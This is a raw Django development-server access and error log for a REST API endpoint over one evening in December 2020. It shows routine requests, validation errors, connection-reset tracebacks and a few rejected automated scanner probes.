Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:04] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:05] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:06] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:07] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:09] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Not Found: /manager/html
[08/Dec/2020 17:49:18] "GET /manager/html HTTP/1.1" 404 2190
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:49:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:50:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:50:25] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:50:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 17:51:47] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 17:51:47] "  /*à     Cookie: mstshash=Administr" 400 -
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:52:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:52:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:53:50] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:53:52] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:55:26] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:55:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:55:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:36] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:43] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:45] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:46] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:50] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:51] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:52] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:54] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:56] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:56:59] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:01] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:21] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:24] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:25] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:57:42] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:58:02] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:02:33] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:03:13] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:05] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:19] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:20] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:22] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:24] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:25] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:26] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:04:31] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:05:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:05:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:05:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:05:59] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:01] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:02] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:04] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:05] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:06] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:06:08] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 18:21:06] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:21:17] "POST /api/vi/ddobakis/ HTTP/1.1" 201 161
[08/Dec/2020 18:21:31] "GET /api/vi/ddobakis/ HTTP/1.1" 200 56258
[08/Dec/2020 18:21:54] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:22:04] "POST /api/vi/ddobakis/ HTTP/1.1" 201 173
[08/Dec/2020 18:22:08] "GET /api/vi/ddobakis/ HTTP/1.1" 200 57050
[08/Dec/2020 18:22:31] "POST /api/vi/ddobakis/ HTTP/1.1" 201 159
[08/Dec/2020 18:22:38] "GET /api/vi/ddobakis/ HTTP/1.1" 200 57440
[08/Dec/2020 18:25:41] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:25:49] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:25:59] "POST /api/vi/ddobakis/ HTTP/1.1" 201 161
[08/Dec/2020 18:26:03] "GET /api/vi/ddobakis/ HTTP/1.1" 200 58608
[08/Dec/2020 18:26:16] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
[08/Dec/2020 18:26:22] "GET /api/vi/ddobakis/ HTTP/1.1" 200 58995
[08/Dec/2020 18:26:38] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:26:49] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:26:58] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 18:27:23] "POST /api/vi/ddobakis/ HTTP/1.1" 201 171
[08/Dec/2020 18:27:32] "GET /api/vi/ddobakis/ HTTP/1.1" 200 60561
[08/Dec/2020 18:28:42] "POST /api/vi/ddobakis/ HTTP/1.1" 201 172
[08/Dec/2020 18:28:46] "GET /api/vi/ddobakis/ HTTP/1.1" 200 60964
[08/Dec/2020 18:30:21] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
[08/Dec/2020 18:30:30] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
[08/Dec/2020 18:30:36] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
[08/Dec/2020 18:30:42] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
[08/Dec/2020 18:30:49] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 18:30:54] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 18:31:01] "POST /api/vi/ddobakis/ HTTP/1.1" 201 159
[08/Dec/2020 18:31:09] "GET /api/vi/ddobakis/ HTTP/1.1" 200 63309
[08/Dec/2020 18:31:21] "POST /api/vi/ddobakis/ HTTP/1.1" 201 160
[08/Dec/2020 18:32:12] "POST /api/vi/ddobakis/ HTTP/1.1" 201 174
[08/Dec/2020 18:32:27] "POST /api/vi/ddobakis/ HTTP/1.1" 201 175
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 50690)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[08/Dec/2020 18:36:41] "GET /api/vi/ddobakis/ HTTP/1.1" 200 64511
Not Found: /hudson
[08/Dec/2020 18:41:15] "GET /hudson HTTP/1.1" 404 2172
[08/Dec/2020 19:17:53] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 19:17:53] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[08/Dec/2020 19:30:23] "GET / HTTP/1.0" 404 2173
[08/Dec/2020 19:38:42] "POST /api/vi/ddobakis/ HTTP/1.1" 201 168
[08/Dec/2020 19:38:56] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 19:47:30] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
[08/Dec/2020 19:47:37] "GET /api/vi/ddobakis/ HTTP/1.1" 200 65685
[08/Dec/2020 19:49:40] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 19:53:26] "POST /api/vi/ddobakis/ HTTP/1.1" 201 161
[08/Dec/2020 19:53:34] "POST /api/vi/ddobakis/ HTTP/1.1" 201 161
[08/Dec/2020 19:53:38] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 19:53:44] "GET /api/vi/ddobakis/ HTTP/1.1" 200 67245
[08/Dec/2020 20:20:59] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 49363)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[08/Dec/2020 20:24:27] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
[08/Dec/2020 20:25:07] "GET /api/vi/ddobakis/ HTTP/1.1" 200 68020
[08/Dec/2020 20:25:28] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
[08/Dec/2020 20:25:35] "GET /api/vi/ddobakis/ HTTP/1.1" 200 68407
[08/Dec/2020 20:26:36] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:41] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:42] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:43] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:44] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:45] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:26:46] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 20:26:54] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 49395)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 20:27:09] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 49415)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[08/Dec/2020 20:38:11] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 20:38:11] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[08/Dec/2020 21:09:56] "GET / HTTP/1.0" 404 2173
[08/Dec/2020 21:12:37] "GET /api/vi/ddobakis/ HTTP/1.1" 200 69182
[08/Dec/2020 21:12:37] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[08/Dec/2020 21:12:37] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[08/Dec/2020 21:12:37] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[08/Dec/2020 21:12:37] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[08/Dec/2020 21:12:37] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[08/Dec/2020 21:12:38] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[08/Dec/2020 21:12:39] "GET /favicon.ico HTTP/1.1" 404 2228
[08/Dec/2020 21:28:28] "POST /api/vi/ddobakis/ HTTP/1.1" 201 156
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 21:44:26] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 21:44:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 21:44:43] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 21:44:53] "POST /api/vi/ddobakis/ HTTP/1.1" 201 157
[08/Dec/2020 22:13:19] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70345
[08/Dec/2020 22:13:20] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70345
[08/Dec/2020 22:13:25] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70345
[08/Dec/2020 22:13:35] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70345
[08/Dec/2020 22:14:07] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70345
[08/Dec/2020 22:14:26] "POST /api/vi/ddobakis/ HTTP/1.1" 201 168
[08/Dec/2020 22:14:33] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70786
[08/Dec/2020 22:15:19] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70786
[08/Dec/2020 22:27:56] code 400, message Bad HTTP/0.9 request type ('\x00\x0e8Ö?zKe÷')
[08/Dec/2020 22:27:56] " 8Ö?zKe÷ä     " 400 -
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 22:35:18] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 22:37:52] "GET /api/vi/ddobakis/ HTTP/1.1" 200 70786
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 22:41:17] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 22:47:45] "POST /api/vi/ddobakis/ HTTP/1.1" 201 183
----------------------------------------
Exception happened during processing of request from ('112.152.69.155', 50203)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[08/Dec/2020 22:48:16] "GET /api/vi/ddobakis/ HTTP/1.1" 200 71242
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[08/Dec/2020 22:48:16] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[08/Dec/2020 22:49:27] "POST /api/vi/ddobakis/ HTTP/1.1" 201 168
[08/Dec/2020 22:49:35] "POST /api/vi/ddobakis/ HTTP/1.1" 201 167
[08/Dec/2020 22:49:46] "POST /api/vi/ddobakis/ HTTP/1.1" 201 167
[08/Dec/2020 22:49:51] "GET /api/vi/ddobakis/ HTTP/1.1" 200 72563
[08/Dec/2020 22:50:02] "POST /api/vi/ddobakis/ HTTP/1.1" 201 179
[08/Dec/2020 22:50:06] "GET /api/vi/ddobakis/ HTTP/1.1" 200 73015
[08/Dec/2020 22:50:26] "POST /api/vi/ddobakis/ HTTP/1.1" 201 168
[08/Dec/2020 22:55:45] "POST /api/vi/ddobakis/ HTTP/1.1" 201 183
[08/Dec/2020 22:55:55] "POST /api/vi/ddobakis/ HTTP/1.1" 201 195
[08/Dec/2020 22:56:01] "GET /api/vi/ddobakis/ HTTP/1.1" 200 74380
[08/Dec/2020 22:56:19] "POST /api/vi/ddobakis/ HTTP/1.1" 201 183
[08/Dec/2020 22:56:24] "POST /api/vi/ddobakis/ HTTP/1.1" 201 183
[08/Dec/2020 22:56:29] "POST /api/vi/ddobakis/ HTTP/1.1" 201 186
[08/Dec/2020 22:56:35] "POST /api/vi/ddobakis/ HTTP/1.1" 201 184
[08/Dec/2020 22:56:38] "GET /api/vi/ddobakis/ HTTP/1.1" 200 76208
[08/Dec/2020 22:56:50] "POST /api/vi/ddobakis/ HTTP/1.1" 201 174
[08/Dec/2020 22:56:55] "POST /api/vi/ddobakis/ HTTP/1.1" 201 182
[08/Dec/2020 22:56:57] "GET /api/vi/ddobakis/ HTTP/1.1" 200 77110
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 23:02:16] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
----------------------------------------
Exception happened during processing of request from ('37.9.13.118', 56958)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[09/Dec/2020 01:28:45] code 400, message Bad request syntax ('º«d¡EZCÛM\x87î^ý¿\x159 XÔ>\x12\x98Ä<à\x13Ï\x00¬\xa09×\x90#8~\x8cÞ\x9dReF¿%1Qà\x9d\x06&g»\x82\x95\x19í\x07\x14\x19ZP\x80+\x94eÃæ\x85\x06¤\x99\x8b\x19l\x01ê\x88Y\x91\x16\x95ÄÈ\x0eH\x02Ç\x93gÁ4FW\x05|ûóT¸ýË»)ãÎÝÍ7\x9eïP\x8c¤[Vý\x98Él\x82õäÁd\x87X÷\x9b¿èq\x12\x99&Û,õ\x87×¨\x97j;ãê§´°\x02\xad\x8dE\x9bªB\x80\x0e)©é¯}\x18\x8e¸\x1e\x99\x04ï¨\x8cè\x04âÓí)1\x91Á\x8f\x88\x8c\x81ðÛ¥\x88\x95H\x9bZ«Î¿ôE%P*\x88KFY6\x9eç::jÔ\x8a¨V\x9aª«¯Ã&.í[\x04Åe\x7f\x08¾\x8ar§°\x99F÷\x11åÖ\x96\x8cIm+w\x1cýuU\x14\x0f!x¬èMPyÃ\x19!2\xa0íÀ}!Rw\x14\x8e\x1bÄá\xa0¯+\xadKkÅà\\s\x9c½Ë')
